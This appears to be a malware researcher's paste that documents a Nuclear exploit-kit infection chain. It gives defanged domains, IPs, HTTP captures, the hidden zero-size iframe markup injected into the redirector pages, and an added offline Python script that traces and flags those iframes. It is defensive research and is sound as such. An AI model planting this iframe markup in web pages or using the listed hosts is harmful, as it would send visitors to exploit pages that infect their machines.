MalwareMustDie

#Nuclear EK infection domain chains..

Jan 16th, 2014
# MalwareMustDie | Nuclear Exploit infection domain chains..(in investigation)
# *.hak.su / wen.ru (178.218.210.188)
# vubetw.com/* (95.211.52.50)
# sk6ev8d.fielderpercussionist.pw/* (192.95.10.211)
# pic: http://box.jisko.net/i/965eec32.png
# Thursday January 16 2014 -- 19:13:36 +02:00
# credit: mak`

Lead:
h00p://jp.hak.su

// forwarded to...

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: h00p://www.google.com
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: jp.hak.su
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: WEN.RU httpD 3.7
Content-Type: text/html; charset=utf-8
Date: Thu, 16 Jan 2014 16:06:48 GMT
Last-Modified: Thu, 16 Jan 2014 12:36:22 GMT
Accept-Ranges: bytes
Connection: close
Cache-Control: no-cache, max-age=0
Pragma: no-cache
Expires: Wed, 15 Jan 2014 16:06:48 GMT
Content-Length: 291

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta h00p-equiv="Content-Type" content="text/html; charset=utf-8">
<title>jp.hak.su</title></head><body>
<p align="center">
</p></body></html> <iframe src="h00p://vubetw.com/jp.php" width="0" height="0"></iframe>

// forwarded to:

less jp.php
<iframe width=10 height=10 src="h00p://sk6ev8d.fielderpercussionist.pw/69e33c-2dbS87-09_06Y6c7X2d0_19Wa8c-4682a4/70/38201690f2b69d4483bd4893d72c0ee8.html"></iframe>


//Fetch

--2014-01-17 01:30:40-- h00p://sk6ev8d.fielderpercussionist.pw/69e33c-2dbS87-09_06Y6c7X2d0_19Wa8c-4682a4/70/38201690f2b69d4483bd4893d72c0ee8.html
Resolving sk6ev8d.fielderpercussionist.pw (sk6ev8d.fielderpercussionist.pw)... 192.95.10.211
Caching sk6ev8d.fielderpercussionist.pw => 192.95.10.211
Connecting to sk6ev8d.fielderpercussionist.pw (sk6ev8d.fielderpercussionist.pw)|192.95.10.211|:80... connected.

GET /69e33c-2dbS87-09_06Y6c7X2d0_19Wa8c-4682a4/70/38201690f2b69d4483bd4893d72c0ee8.html h00p/1.1
Referer: h00p://vubetw.com/jp.php
Host: sk6ev8d.fielderpercussionist.pw
HTTP request sent, awaiting response...

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 16 Jan 2014 16:30:45 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.27
Vary: Accept-Encoding,User-Agent
Content-Length: 3

200 OK
Length: 3 [text/html]
Saving to: '38201690f2b69d4483bd4893d72c0ee8.html'
2014-01-17 01:30:41 (56.4 KB/s) - '38201690f2b69d4483bd4893d72c0ee8.html' saved

---
#MalwareMustDie!
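The chain above is lead page -> zero-size iframe -> 10x10 iframe -> landing URL, and the last hop answered the replay with only 3 bytes. The script below is an added example, not part of the original paste and not MalwareMustDie's tooling: it walks that chain offline from the two HTML bodies copied out of the paste and flags the hidden iframes that carry it. Assumptions: the page store PAGES is constructed from the paste (the landing page body is a 3-byte placeholder, since only its Content-Length was recorded), the "hidden iframe" rule (width and height both at most 10px) is a heuristic picked to match the two frames seen here rather than a documented Nuclear EK signature, and the "h00p" defanging is preserved in input and output exactly as the author wrote it.

```python
"""Walk the hidden-iframe chain recorded above (added example, not the paste's own code)."""
from html.parser import HTMLParser
from urllib.parse import urljoin

LANDING = ("h00p://sk6ev8d.fielderpercussionist.pw/"
           "69e33c-2dbS87-09_06Y6c7X2d0_19Wa8c-4682a4/70/"
           "38201690f2b69d4483bd4893d72c0ee8.html")

# Constructed sample: bodies copied from the paste, keyed by the URL each was served from.
PAGES = {
    "h00p://jp.hak.su/": (
        '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">'
        '<html><head><meta h00p-equiv="Content-Type" '
        'content="text/html; charset=utf-8"><title>jp.hak.su</title></head>'
        '<body><p align="center"></p></body></html> '
        '<iframe src="h00p://vubetw.com/jp.php" width="0" height="0"></iframe>'
    ),
    "h00p://vubetw.com/jp.php": (
        '<iframe width=10 height=10 src="' + LANDING + '"></iframe>'
    ),
    # Placeholder (assumption): the paste records Content-Length: 3 but not the body.
    LANDING: "   ",
}


def refang(url: str) -> str:
    """Turn the paste's defanged scheme back into a real one for URL handling."""
    return url.replace("h00p://", "http://").replace("hxxp://", "http://")


def defang(url: str) -> str:
    """Re-defang for reporting so the URL is not accidentally clickable."""
    return url.replace("http://", "h00p://")


class IframeExtractor(HTMLParser):
    """Collect every <iframe> start tag, including ones appended after </html>."""

    def __init__(self) -> None:
        super().__init__()
        self.frames: list[dict] = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append(dict(attrs))


def _px(value):
    """Parse a width/height attribute ("0", "10", "10px") to an int, else None."""
    if value is None:
        return None
    text = str(value).strip().lower().removesuffix("px").strip()
    return int(text) if text.isdigit() else None


def hidden_iframes(html: str, base_url: str, max_px: int = 10) -> list[str]:
    """Absolute (refanged) src of each iframe sized <= max_px on both axes (heuristic)."""
    parser = IframeExtractor()
    parser.feed(html)
    parser.close()
    found = []
    for attrs in parser.frames:
        src = attrs.get("src")
        width, height = _px(attrs.get("width")), _px(attrs.get("height"))
        if src and width is not None and height is not None \
                and width <= max_px and height <= max_px:
            found.append(urljoin(refang(base_url), refang(src)))
    return found


def follow_chain(start: str, pages: dict, max_hops: int = 10) -> list[tuple[str, str]]:
    """Follow hidden iframes through the offline page store, one (URL, note) per hop.

    Stops at the first page without a hidden iframe (the landing page), at a page
    with no captured body, or when a URL repeats (redirect loop).
    """
    store = {refang(k): v for k, v in pages.items()}
    chain, seen, url = [], set(), refang(start)
    while url not in seen and len(chain) < max_hops:
        seen.add(url)
        body = store.get(url)
        if body is None:
            chain.append((defang(url), "no body captured"))
            break
        nxt = hidden_iframes(body, url)
        if not nxt:
            chain.append((defang(url),
                          f"landing page, {len(body.encode())} bytes, no hidden iframe"))
            break
        chain.append((defang(url), f"hidden iframe -> {defang(nxt[0])}"))
        url = nxt[0]
    return chain


if __name__ == "__main__":
    for hop, (url, note) in enumerate(follow_chain("h00p://jp.hak.su/", PAGES)):
        print(f"[{hop}] {url}\n     {note}")
```

The first iframe sits after the closing </html> tag, which a strict "parse the document tree" approach can miss; the tag-level parser above sees it anyway, which is the check to keep when triaging a redirector page that looks empty in a browser's view-source.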